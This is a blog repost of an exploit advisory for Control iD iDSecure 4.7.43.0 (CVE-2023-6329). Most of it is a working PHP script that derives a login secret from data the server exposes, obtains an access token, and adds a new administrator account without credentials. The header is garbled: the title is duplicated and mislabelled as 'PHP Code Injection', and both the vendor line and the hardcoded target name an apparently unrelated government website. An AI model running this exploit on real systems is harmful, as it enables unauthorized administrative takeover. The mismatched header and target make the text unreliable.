Latest Tech

Latest Posts

 

 

Control iD iDSecure 4.7.43.0 Add Administrator / Authentication Bypass

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 201
Control iD iDSecure 4.7.43.0 Add Administrator / Authentication Bypass
Control iD iDSecure 4.7.43.0 Add Administrator / Authentication Bypass
=============================================================================================================================================
| # Title : Control iD =============================================================================================================================================
| # Title : Control iD iDSecure v4.7.43.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://profil.nunukankab.go.id/org/dkisp |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: The code exploits a vulnerability in the ControlID system to add a new administrative user without requiring an existing password.

( https://packetstorm.news/files/id/180858/ CVE-2023-6329)

[+] save code as poc.php.

[+] Set Target : line 114

[+] USage : php poc.php

[+] PayLoad :

<?php

class ControlIDExploit {
private $target;
private $new_user;
private $new_password;

public function __construct($target, $new_user, $new_password) {
$this->target = rtrim($target, '/'); // ????? ?? "/" ????? ?? ???????
$this->new_user = $new_user;
$this->new_password = $new_password;
}

private function send_request($method, $uri, $data = null, $headers = []) {
$url = "{$this->target}{$uri}";
$ch = curl_init($url);

curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // ???? ????? 10 ?????

if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data, JSON_UNESCAPED_UNICODE));
$headers[] = 'Content-Type: application/json';
}

if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

if ($error) {
die(" Error connecting to $url: $error\n");
}

if ($http_code == 404) {
die(" Unexpected response (404 - Not Found): Check the link is valid $url\n");
}

return json_decode(mb_convert_encoding($response, 'UTF-8', 'auto'), true);
}

public function exploit() {
echo " Trying to get the raw data...\n";

// 1) ?????? ??? serial ? passwordRandom
$response = $this->send_request('GET', '/api/login/unlockGetData');

if (!isset($response['passwordRandom']) || !isset($response['serial'])) {
die("? Failed to get raw data. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}

$password_random = $response['passwordRandom'];
$serial = $response['serial'];

echo " Retrieved passwordRandom: $password_random\n";
echo " Retrieved serial: $serial\n";

// 2) ????? passwordCustom
$sha1_hash = sha1($serial);
$combined_string = $sha1_hash . $password_random . 'cid2016';
$sha256_hash = hash('sha256', $combined_string);
$short_hash = substr($sha256_hash, 0, 6);
$password_custom = hexdec($short_hash);

echo " Created passwordCustom: $password_custom\n";

// 3) ????? ?????? ?????? ??? JWT
echo "Attempt to login...\n";
$login_data = [
'passwordCustom' => (string)$password_custom,
'passwordRandom' => $password_random
];

$response = $this->send_request('POST', '/api/login/', $login_data);
if (!isset($response['accessToken'])) {
die(" Login failed. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}

$access_token = $response['accessToken'];
echo " Obtained JWT: $access_token\n";

// 4) ????? ?????? ????? ????
echo " Trying to add a new user...\n";
$user_data = [
'idType' => '1',
'name' => $this->new_user,
'user' => $this->new_user,
'newPassword' => $this->new_password,
'password_confirmation' => $this->new_password
];

$headers = [
"Authorization: Bearer $access_token"
];

$response = $this->send_request('POST', '/api/operator/', $user_data, $headers);
if (!isset($response['code']) || $response['code'] != 200) {
die(" Failed to add new user. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}

echo " User added successfully: {$this->new_user}:{$this->new_password}\n";
}
}

// ? ???? ?????? ????????? ???
$target_host = 'https://profil.nunukankab.go.id'; // ?????? ?????? ??????
$new_admin_user = 'adminuser';
$new_admin_password = 'securepassword';

// ????? ?????
$exploit = new ControlIDExploit($target_host, $new_admin_user, $new_admin_password);
$exploit->exploit();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© 2025 Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.